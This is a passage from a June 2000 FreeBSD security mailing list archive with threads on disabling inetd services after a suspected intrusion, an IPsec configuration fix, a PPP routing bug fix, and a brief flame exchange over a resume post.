/usr/libexec/rlogind rlogind > finger stream tcp6 nowait/3/10 nobody /usr/libexec/fingerd fingerd -s > > Question is: which of these daemons can be disabled (or even inetd itself) w/o any harm. I've no use of NFS -- plain http/ftp/pop server. SMTP and POP stuff is already handled by tcpserv. > > I've already set up hosts.allow: denied any w/o reverse DNS, allowed any ftp, portmap, and ssh; denied all other daemons/users except trusted address. > Where can I find out additional info about hosts.allow syntax? > > Thanx in advance. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 19 7: 7: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from ixori.demon.nl (ixori.demon.nl [195.11.248.5]) by hub.freebsd.org (Postfix) with ESMTP id 63A7C37B8DF for ; Mon, 19 Jun 2000 07:06:49 -0700 (PDT) (envelope-from bart@ixori.demon.nl) Received: from smtp-relay by ixori.demon.nl (8.9.3/8.9.2) with ESMTP id QAA20351; Mon, 19 Jun 2000 16:09:57 +0200 (CEST) (envelope-from bart@ixori.demon.nl) Received: from network (intranet) by smtp-relay (Bart's intranet smtp server) Date: Mon, 19 Jun 2000 16:10:56 +0200 (CEST) From: Bart van Leeuwen To: Oleg Strizhak Cc: FreeBSD-security Subject: Re: tried to be cracked In-Reply-To: <002b01bfd9f1$03fb2680$a4df36c3@Inforser.Ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org First of all I'd suspect something weird happened on that machine, tho not a hack attempt per se. (it might be) You could prolly do without telnet, rshd, rlogind and finger, and ntalk and comsat are also not required unless you use shell accounts, in which case they are more handy then required. If I don't need it,. I prefer disabling inetd entirely. I'd suggest to at least use ssh instead of rsh/telnet for shell access. (comes with 4.0, or use openssh or ssh from the ports collection) This will allow for stronger authentication for shell logins, it will encrypt the session, and it can be setup such that only RSA based authentication will allow someone in (which results in that your password is never sent over the net at all). This does require your clients to be secure enough, but that should be a requirement anyway else a client from someone who has privileges on your machine is a very easy way in. For the rest it is good to close things a bit with wrappers, but I'd prolly checkout ipf or ipfw for such things because it keeps away unwanted traffic in a bit lower level way ;-) (combining both can work well, and how you should do this is for as far as I can see a matter of belief ;-) It might also be a nice idea to run your ftpd in a chrooted or jailed environment if that is possible with your kind of usage. Esp. running in a jail might prevent losing system trust when your ftpd gets compromised. (note that if your system is indeed compromised right now, it would be a very good idea to at least check each and every file on it for modification in case the intruder left some form of backdoor or other malicious code or configuration, so you cannot trust your system right now) A problem here is that if your system is compromised, an intruder is quite likely to edit out entries related to the intrucion from your log files. Because of this it might be a good idea to log to a different machine. This might allow an intruder to introduce extra logging information, but will make it very hard if not impossible to remove logging data. Another thing to do is to enable process accounting, it can help you track what happened here. Last but not least, install and run some ids software (snort from the ports collection might be a good choice) that is able to keep track of uusual or known malicious activity and can generate alerts based on what it sees. man init and man security are the first 2 places to look for information, In case you did not find that part, man hosts_options explains the syntax of the hosts.allow file. Bart van Leeuwen ----------------------------------------------------------- mailto:bart@ixori.demon.nl - http://www.ixori.demon.nl/ ----------------------------------------------------------- On Mon, 19 Jun 2000, Oleg Strizhak wrote: > Hi all! > > Today seeng this in messages: > Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534 > Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534 > > checked all the logs -- there was no login via telnet, ssh. Nothing of activity was detected for that period of time on my http or ftp daemons. So I suppose that it was through one of the predifined inetd services. > > Here is my inetd.conf's enabled nodes: > > ftp stream tcp nowait root /usr/local/sbin/proftpd proftpd > telnet stream tcp nowait root /usr/libexec/telnetd telnetd > shell stream tcp nowait root /usr/libexec/rshd rshd > login stream tcp nowait root /usr/libexec/rlogind rlogind > finger stream tcp nowait/3/10 nobody /usr/libexec/fingerd fingerd -s > comsat dgram udp wait tty:tty /usr/libexec/comsat comsat > ntalk dgram udp wait tty:tty /usr/libexec/ntalkd ntalkd > > > # > # IPv6 services > # > ftp stream tcp6 nowait root /usr/local/sbin/proftpd proftpd > telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd > shell stream tcp6 nowait root /usr/libexec/rshd rshd > login stream tcp6 nowait root /usr/libexec/rlogind rlogind > finger stream tcp6 nowait/3/10 nobody /usr/libexec/fingerd fingerd -s > > Question is: which of these daemons can be disabled (or even inetd itself) w/o any harm. I've no use of NFS -- plain http/ftp/pop server. SMTP and POP stuff is already handled by tcpserv. > > I've already set up hosts.allow: denied any w/o reverse DNS, allowed any ftp, portmap, and ssh; denied all other daemons/users except trusted address. > Where can I find out additional info about hosts.allow syntax? > > Thanx in advance. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 19 7: 9:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from ixori.demon.nl (ixori.demon.nl [195.11.248.5]) by hub.freebsd.org (Postfix) with ESMTP id 4888637BCEB for ; Mon, 19 Jun 2000 07:09:01 -0700 (PDT) (envelope-from bart@ixori.demon.nl) Received: from smtp-relay by ixori.demon.nl (8.9.3/8.9.2) with ESMTP id QAA20358; Mon, 19 Jun 2000 16:12:17 +0200 (CEST) (envelope-from bart@ixori.demon.nl) Received: from network (intranet) by smtp-relay (Bart's intranet smtp server) Date: Mon, 19 Jun 2000 16:13:23 +0200 (CEST) From: Bart van Leeuwen To: "tjk@tksoft.com" Cc: Oleg Strizhak , FreeBSD-security@freebsd.org Subject: Re: tried to be cracked In-Reply-To: <200006191351.GAA07969@uno.tksoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org to add to that, on 4.0 it seems to be man hosts_options for info on the hosts.allow file. Another very usefuill command to look at is sockstat (-an), it will tell you which 'command' is actually listening to which port on your machine. Bart van Leeuwen ----------------------------------------------------------- mailto:bart@ixori.demon.nl - http://www.ixori.demon.nl/ ----------------------------------------------------------- On Mon, 19 Jun 2000, tjk@tksoft.com wrote: > You don't need any service you don't know about. > > You can disable all of them, except ftp and telnet, if > you use telnet. You should also not have any daemons > running which you don't use. mountd, nfsd, portmap, etc.. > > Try > "man hosts.allow" or "man hosts_access" > (not at a FreeBSD box right now, so can't check.) > > Anyway, you can use "netstat -n -a" to find out what > ports you have open. > > Troy > > > > > Hi all! > > > > Today seeng this in messages: > > Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534 > > Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534 > > > > checked all the logs -- there was no login via telnet, ssh. Nothing of activity was detected for that period of time on my http or ftp daemons. So I suppose that it was through one of the predifined inetd services. > > > > Here is my inetd.conf's enabled nodes: > > > > ftp stream tcp nowait root /usr/local/sbin/proftpd proftpd > > telnet stream tcp nowait root /usr/libexec/telnetd telnetd > > shell stream tcp nowait root /usr/libexec/rshd rshd > > login stream tcp nowait root /usr/libexec/rlogind rlogind > > finger stream tcp nowait/3/10 nobody /usr/libexec/fingerd fingerd -s > > comsat dgram udp wait tty:tty /usr/libexec/comsat comsat > > ntalk dgram udp wait tty:tty /usr/libexec/ntalkd ntalkd > > > > > > # > > # IPv6 services > > # > > ftp stream tcp6 nowait root /usr/local/sbin/proftpd proftpd > > telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd > > shell stream tcp6 nowait root /usr/libexec/rshd rshd > > login stream tcp6 nowait root /usr/libexec/rlogind rlogind > > finger stream tcp6 nowait/3/10 nobody /usr/libexec/fingerd fingerd -s > > > > Question is: which of these daemons can be disabled (or even inetd itself) w/o any harm. I've no use of NFS -- plain http/ftp/pop server. SMTP and POP stuff is already handled by tcpserv. > > > > I've already set up hosts.allow: denied any w/o reverse DNS, allowed any ftp, portmap, and ssh; denied all other daemons/users except trusted address. > > Where can I find out additional info about hosts.allow syntax? > > > > Thanx in advance. > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 19 11:35: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from decoy.sfc.keio.ac.jp (decoy.sfc.keio.ac.jp [133.27.84.101]) by hub.freebsd.org (Postfix) with ESMTP id BA70E37B834 for ; Mon, 19 Jun 2000 11:35:00 -0700 (PDT) (envelope-from say@sfc.wide.ad.jp) Received: from localhost (localhost.sfc.keio.ac.jp [127.0.0.1]) by decoy.sfc.keio.ac.jp (8.9.3/8.9.3) with ESMTP id DAA41477; Tue, 20 Jun 2000 03:34:34 +0900 (JST) (envelope-from say@sfc.wide.ad.jp) To: gronimw@stuy.edu Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ipsec misconfiguration problem From: ARIGA Seiji In-Reply-To: <20000619004802.A1461@spike.brainlink.com> References: <20000619004802.A1461@spike.brainlink.com> X-Mailer: Mew version 1.95b3 on Emacs 20.7 / Mule 4.0 (HANANOEN) X-PGP-Publickey: http://decoy.sfc.keio.ac.jp/~say/key.txt X-PGP-Fingerprint: 8E 70 AB 20 44 E6 8A 8A 1C 49 B3 30 44 1B B3 BA Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000620033433M.say@decoy.sfc.keio.ac.jp> Date: Tue, 20 Jun 2000 03:34:33 +0900 X-Dispatcher: imput version 991025(IM133) Lines: 49 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, First of all, I assume that you are using FreeBSD4.0-RELEASE. On Mon, 19 Jun 2000 00:48:02 -0400, Spike Gronim wrote, : I tried a lot of things, and then copied the NetBSD documentation setup : (http://www.netbsd.org/Documentation/network/ipsec/#sample_esp) : IPsec functions are based on KAME (http://www.kame.net) code. FreeBSD4.0 is based on old KAME code, though NetBSD merged very recent code. So, IPsec configuration is bit different between these OSes. : [ipsec.conf] : add 192.168.0.1 192.168.0.200 esp 9876 -E des-cbc "hogehoge"; : add 192.168.0.200 192.168.0.1 esp 10000 -E des-cbc "mogamoga"; : add 192.168.0.1 192.168.0.200 ah 9877 -A hmac-md5 "hogehogehogehoge"; : add 192.168.0.200 192.168.0.1 ah 10001 -A hmac-md5 "mogamogamogamoga"; : spdadd 192.168.0.1 192.168.0.200 any -P out\ : ipsec esp/transport//use ah/transport//use; : [ipsec.conf] Try this, on 192.168.0.1, add 192.168.0.1 192.168.0.200 esp 9876 -E des-cbc "hogehoge"; add 192.168.0.200 192.168.0.1 esp 10000 -E des-cbc "mogamoga"; add 192.168.0.1 192.168.0.200 ah 9877 -A hmac-md5 "hogehogehogehoge"; add 192.168.0.200 192.168.0.1 ah 10001 -A hmac-md5 "mogamogamogamoga"; spdadd 192.168.0.1 192.168.0.200 any -P out ipsec esp/transport/192.168.0.1-192.168.0.200/use ah/transport/192.168.0.1-192.168.0.200/use; on 192.168.0.200 add 192.168.0.1 192.168.0.200 esp 9876 -E des-cbc "hogehoge"; add 192.168.0.200 192.168.0.1 esp 10000 -E des-cbc "mogamoga"; add 192.168.0.1 192.168.0.200 ah 9877 -A hmac-md5 "hogehogehogehoge"; add 192.168.0.200 192.168.0.1 ah 10001 -A hmac-md5 "mogamogamogamoga"; spdadd 192.168.0.200 192.168.0.1 any -P out ipsec esp/transport/192.168.0.200-192.168.0.1/use ah/transport/192.168.0.200-192.168.0.1/use; As you see, you have to swap IP address only for spdadd. # I think it is because both nodes have to share the same SA configuration. And also you have to add "src-dst" for spd. // ARIGA Seiji To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 19 13:57:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A144D37B517 for ; Mon, 19 Jun 2000 13:57:30 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA44766 for ; Mon, 19 Jun 2000 13:57:30 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 19 Jun 2000 13:57:30 -0700 (PDT) From: Kris Kennaway To: security@Freebsd.org Subject: Dinner at Usenix on Tuesday Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those of you who are going to be around at Usenix on Tuesday evening, and who have an interest in FreeBSD security matters (or just want to go out for dinner), Robert Watson and I and one or two others were planning to get together to chat about such things. No definite plans yet, but Robert tells me he's planning to be hanging around in the lobby possibly wearing a TrustedBSD T-Shirt, and I'll most likely be in the terminal room :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-chat" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 2:52:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id DA85537BD60; Tue, 20 Jun 2000 02:52:30 -0700 (PDT) (envelope-from ady@warpnet.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id NAA02647; Tue, 20 Jun 2000 13:00:10 +0300 (EEST) (envelope-from ady@warpnet.ro) Date: Tue, 20 Jun 2000 13:00:10 +0300 (EEST) From: Adrian Penisoara To: freebsd-isp@FreeBSD.ORG Cc: freebsd-security@FreeBSD.ORG, tech@OpenBSD.org, Brian Somers Subject: ATTN: FIX for PPP with >9 tunnels / possible DoS Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Whoever uses userland PPP with more than 9 tunnel devices compiled in kernel should be updating to the latest (post 2000/06/19) sources, a bug which was affecting route deletion handling has just been committed. What is it all about: at startup PPP was getting a wrong interface index number in the routing table and upon termination it was deleting routes for the wrong tunnel interface. Evil users may exploit this in that they can block those PPP links who use the first tunnel interfaces. For more detalis please chek out PR #19384 ( http://www.freebsd.org/cgi/query-pr.cgi?pr=19384 ); please do not use the patch suggested in the PR, better use the version committed in the CVS tree which is optimised. *All* FreeBSD branches are affected; the fix has been committed for 3-stable, 4-stable and 5-current branches. I CC'ed to OpenBSD's technical mailing lists because they are using the same source package and might be affected (?). Thanks, Adrian Penisoara Ady (@freebsd.ady.ro) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 4:23:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from storm.FreeBSD.org.uk (storm.freebsd.org.uk [194.242.139.170]) by hub.freebsd.org (Postfix) with ESMTP id 85B1437BE72; Tue, 20 Jun 2000 04:23:17 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.nat.Awfulhak.org [172.31.0.12]) by storm.FreeBSD.org.uk (8.9.3/8.9.3) with ESMTP id MAA68974; Tue, 20 Jun 2000 12:09:17 +0100 (BST) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id MAA60668; Tue, 20 Jun 2000 12:08:30 +0100 (BST) (envelope-from brian@Awfulhak.org) Message-Id: <200006201108.MAA60668@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: Adrian Penisoara Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG, tech@OpenBSD.org, Brian Somers , brian@hak.lan.Awfulhak.org Subject: Re: ATTN: FIX for PPP with >9 tunnels / possible DoS In-Reply-To: Message from Adrian Penisoara of "Tue, 20 Jun 2000 13:00:10 +0300." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 20 Jun 2000 12:08:29 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [.....] > *All* FreeBSD branches are affected; the fix has been committed for > 3-stable, 4-stable and 5-current branches. I CC'ed to OpenBSD's technical > mailing lists because they are using the same source package and might be > affected (?). The fix was committed to OpenBSD too. > Thanks, > Adrian Penisoara > Ady (@freebsd.ady.ro) -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 6:31:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from jello.geekspace.com (216-064-051-142.inaddr.vitts.com [216.64.51.142]) by hub.freebsd.org (Postfix) with SMTP id 97D4537B50D for ; Tue, 20 Jun 2000 06:31:42 -0700 (PDT) (envelope-from chris.williams@third-rail.net) Received: (qmail 59448 invoked from network); 20 Jun 2000 13:36:26 -0000 Received: from 216-064-051-150.inaddr.vitts.com (HELO third-rail.net) (@216.64.51.150) by 216-064-051-142.inaddr.vitts.com with SMTP; 20 Jun 2000 13:36:26 -0000 Message-ID: <394F7188.D790BDBF@third-rail.net> Date: Tue, 20 Jun 2000 09:28:40 -0400 From: Chris Williams X-Mailer: Mozilla 4.72 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Speaking of PPP.. References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does anyone know a way of doing pass-through authentication to an NT domain controller for MSCHAP PPP authentication on a BSD box? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 8:36:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from storm.FreeBSD.org.uk (storm.freebsd.org.uk [194.242.139.170]) by hub.freebsd.org (Postfix) with ESMTP id 059B537B740 for ; Tue, 20 Jun 2000 08:36:16 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.nat.Awfulhak.org [172.31.0.12]) by storm.FreeBSD.org.uk (8.9.3/8.9.3) with ESMTP id QAA80567; Tue, 20 Jun 2000 16:35:58 +0100 (BST) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id QAA62868; Tue, 20 Jun 2000 16:35:03 +0100 (BST) (envelope-from brian@Awfulhak.org) Message-Id: <200006201535.QAA62868@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: Chris Williams Cc: freebsd-security@FreeBSD.ORG, brian@hak.lan.Awfulhak.org Subject: Re: Speaking of PPP.. In-Reply-To: Message from Chris Williams of "Tue, 20 Jun 2000 09:28:40 EDT." <394F7188.D790BDBF@third-rail.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 20 Jun 2000 16:35:03 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Does anyone know a way of doing pass-through authentication to an NT > domain controller for MSCHAP PPP authentication on a BSD box? The only thing like this that ppp can do at the moment is radius authentication. I think the cleanest way to tackle it would be to implement a PAM module to do the NT bit and then teach ppp to do PAM. I have the ppp/PAM bit on my todo list, but it's been there for a long time :-/ -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 12: 6:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from typhoon.direct-internet.net (typhoon.direct-internet.net [207.245.193.3]) by hub.freebsd.org (Postfix) with ESMTP id 7B4CD37BBE7; Tue, 20 Jun 2000 12:06:18 -0700 (PDT) (envelope-from info@direct-internet.net) Received: from fusion (fusion.direct-internet.net [207.245.193.32]) by typhoon.direct-internet.net (8.10.0/8.10.0) with SMTP id e5KIw2504286; Tue, 20 Jun 2000 14:58:02 -0400 (EDT) Message-ID: <00dc01bfdae7$499eaee0$20c1f5cf@directinternet.net> From: "Duncan de Verteuil" To: , Cc: References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> <20000618031620.B3840@server.nostromo.in-berlin.de> Subject: Re: Resume... Date: Tue, 20 Jun 2000 14:42:28 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: H. Eckert To: ; Cc: Sent: Saturday, June 17, 2000 9:16 PM Subject: Re: Resume... > Quoting Jason L. Schwab (jlschwab@uswest.net): > > X-Mailer: Microsoft Outlook Express 5.00.2615.200 > > I am 17 years of age. > > I consider my self a professional unix system administrator. > > Consider yourself lucky to be qualified to admin a microwave > at a fastfood restaurant. This might even help you to get a > chance to get a real qualification in the near future. > > Greetings, > Ripley > > Aren't YOU one arrogant piece of... *shakes head* I am disgusted. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 13:12:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP.MC.VANDERBILT.EDU (mcsmtp.mc.Vanderbilt.Edu [160.129.93.202]) by hub.freebsd.org (Postfix) with SMTP id 0968F37BFD7 for ; Tue, 20 Jun 2000 13:12:45 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Received: by MCSMTP.MC.VANDERBILT.EDU(Lotus SMTP MTA v4.6.6 (890.1 7-16-1999)) id 86256904.006E2537 ; Tue, 20 Jun 2000 15:03:04 -0500 X-Lotus-FromDomain: VANDERBILT From: George.Giles@mcmail.vanderbilt.edu To: freebsd-security@freebsd.org Message-ID: <86256904.006E24B6.00@MCSMTP.MC.VANDERBILT.EDU> Date: Tue, 20 Jun 2000 15:10:19 -0500 Subject: Re: Resume... Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Arrogance is a prussian characteristic, that has caused much misery over the years. A wise old saying comes to mind: "Better to be thought a fool, than to open your mouth and remove all doubt." |--------+--------------------------> | | "Duncan de | | | Verteuil" | | | | | | | | | 06/20/00 01:42 | | | PM | | | | |--------+--------------------------> >------------------------------------------------------| | | | To: freebsd-isp@freebsd.org, | | freebsd-security@freebsd.org | | cc: ripley@nostromo.in-berlin.de, (bcc: | | George Giles/VUMC/Vanderbilt) | | Subject: Re: Resume... | >------------------------------------------------------| ----- Original Message ----- From: H. Eckert To: ; Cc: Sent: Saturday, June 17, 2000 9:16 PM Subject: Re: Resume... > Quoting Jason L. Schwab (jlschwab@uswest.net): > > X-Mailer: Microsoft Outlook Express 5.00.2615.200 > > I am 17 years of age. > > I consider my self a professional unix system administrator. > > Consider yourself lucky to be qualified to admin a microwave > at a fastfood restaurant. This might even help you to get a > chance to get a real qualification in the near future. > > Greetings, > Ripley > > Aren't YOU one arrogant piece of... *shakes head* I am disgusted. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 13:23:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from typhoon.direct-internet.net (typhoon.direct-internet.net [207.245.193.3]) by hub.freebsd.org (Postfix) with ESMTP id 363D537BF0E for ; Tue, 20 Jun 2000 13:22:57 -0700 (PDT) (envelope-from info@direct-internet.net) Received: from fusion (fusion.direct-internet.net [207.245.193.32]) by typhoon.direct-internet.net (8.10.0/8.10.0) with SMTP id e5KKT8505707 for ; Tue, 20 Jun 2000 16:29:08 -0400 (EDT) Message-ID: <000d01bfdaf3$fa7457e0$20c1f5cf@directinternet.net> From: "Duncan de Verteuil" To: References: <86256904.006E24B6.00@MCSMTP.MC.VANDERBILT.EDU> Subject: Re: Resume... Date: Tue, 20 Jun 2000 16:13:19 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bravo! It is very appropriate. My hat's off to you! Duncan de Verteuil > > > Arrogance is a prussian characteristic, that has caused much misery over the > years. > > A wise old saying comes to mind: > > "Better to be thought a fool, than to open your mouth and remove all doubt." > > > > |--------+--------------------------> > | | "Duncan de | > | | Verteuil" | > | | | | ernet.net> | > | | | > | | 06/20/00 01:42 | > | | PM | > | | | > |--------+--------------------------> > >------------------------------------------------------| > | | > | To: freebsd-isp@freebsd.org, | > | freebsd-security@freebsd.org | > | cc: ripley@nostromo.in-berlin.de, (bcc: | > | George Giles/VUMC/Vanderbilt) | > | Subject: Re: Resume... | > >------------------------------------------------------| > > > > > ----- Original Message ----- > From: H. Eckert > To: ; > Cc: > Sent: Saturday, June 17, 2000 9:16 PM > Subject: Re: Resume... > > > > Quoting Jason L. Schwab (jlschwab@uswest.net): > > > X-Mailer: Microsoft Outlook Express 5.00.2615.200 > > > I am 17 years of age. > > > I consider my self a professional unix system administrator. > > > > Consider yourself lucky to be qualified to admin a microwave > > at a fastfood restaurant. This might even help you to get a > > chance to get a real qualification in the near future. > > > > Greetings, > > Ripley > > > > > Aren't YOU one arrogant piece of... *shakes head* > I am disgusted. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 15:37:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from majordomo2.umd.edu (majordomo2.umd.edu [128.8.10.7]) by hub.freebsd.org (Postfix) with ESMTP id 1FF2C37B5C5 for ; Tue, 20 Jun 2000 15:37:50 -0700 (PDT) (envelope-from howardjp@wam.umd.edu) Received: from rac10.wam.umd.edu (root@rac10.wam.umd.edu [128.8.10.150]) by majordomo2.umd.edu (8.9.3/8.9.3) with ESMTP id SAA18987 for ; Tue, 20 Jun 2000 18:37:44 -0400 (EDT) Received: from rac10.wam.umd.edu (sendmail@localhost [127.0.0.1]) by rac10.wam.umd.edu (8.9.3/8.9.3) with SMTP id SAA20296 for ; Tue, 20 Jun 2000 18:37:48 -0400 (EDT) Received: from rac10.wam.umd.edu (howardjp@localhost) by rac10.wam.umd.edu (8.9.3/8.9.3) with ESMTP id SAA20291 for ; Tue, 20 Jun 2000 18:37:47 -0400 (EDT) Message-Id: <200006202237.SAA20291@rac10.wam.umd.edu> X-Authentication-Warning: rac10.wam.umd.edu: howardjp owned process doing -bs To: freebsd-security@freebsd.org Subject: Network ACLs Date: Tue, 20 Jun 2000 18:37:42 -0400 From: James Howard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I know that the TrustedBSD group is working on filesystem ACLs. Will something similar be extended to the socket interface? Thanks, Jamie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 15:49: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from facmail.cc.gettysburg.edu (facmail.gettysburg.edu [138.234.4.150]) by hub.freebsd.org (Postfix) with ESMTP id 0FBBB37BE29 for ; Tue, 20 Jun 2000 15:49:02 -0700 (PDT) (envelope-from s467338@gettysburg.edu) Received: from jupiter2 (jupiter2.cc.gettysburg.edu [138.234.4.6]) by facmail.cc.gettysburg.edu (8.9.3/8.9.3) with SMTP id SAA06222; Tue, 20 Jun 2000 18:48:28 -0400 (EDT) Date: Tue, 20 Jun 2000 18:48:28 -0400 (EDT) From: Andrew Reiter X-Sender: s467338@jupiter2 To: James Howard Cc: freebsd-security@FreeBSD.ORG Subject: Re: Network ACLs In-Reply-To: <200006202237.SAA20291@rac10.wam.umd.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Imo, it's not too difficult to add ACLs via a kernel hack or via a KLD and then setting a higher securelevel. The socket syscall gets passed a structu proc *p [like all other syscalls], and therefore one can check uid, euid, etc etc etc... and do a hack in this manor. Andrew On Tue, 20 Jun 2000, James Howard wrote: |I know that the TrustedBSD group is working on filesystem ACLs. Will |something similar be extended to the socket interface? | 